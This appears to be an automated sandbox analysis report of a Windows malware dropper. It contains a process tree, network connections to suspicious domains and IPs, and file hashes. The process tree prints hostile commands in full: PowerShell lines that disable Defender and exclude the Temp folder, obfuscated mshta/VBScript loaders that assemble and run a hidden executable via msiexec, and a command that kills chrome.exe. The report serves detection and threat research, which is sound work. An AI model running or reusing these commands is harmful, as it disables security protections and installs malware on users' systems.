PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 272

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$6022A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$30204,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 464

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:49276 tcp
N/A 127.0.0.1:49278 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.microsoft.com udp
NO 96.6.17.223:80 www.microsoft.com tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 72.247.176.59:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

C:\Users\Admin\AppData\Local\Temp\7zS86973696\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS86973696\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS86973696\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2204-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS86973696\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2204-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS86973696\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2204-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2204-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2204-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2204-65-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2204-64-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2204-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2204-73-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2204-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2204-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/468-123-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WG9PX85Y3ANSBFG02AUK.temp

MD5 fee0d9743a25c648621e1c9dfa375d3b
SHA1 3c8c37b09d02ae8257b88c2501f968b3a639360d
SHA256 5297c6ff118650cca51f23cbb69b55d5eef7d67eafce75fce3ab610ad3cce2d0
SHA512 6e2ab9b59760537e4861cb7ba6d8077cd1adb06e77960cc56c183e7b0522dad76be4fbea315afe9406206eb315c38bcd9c712ece638e92de9e4126431c8e67fc

\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
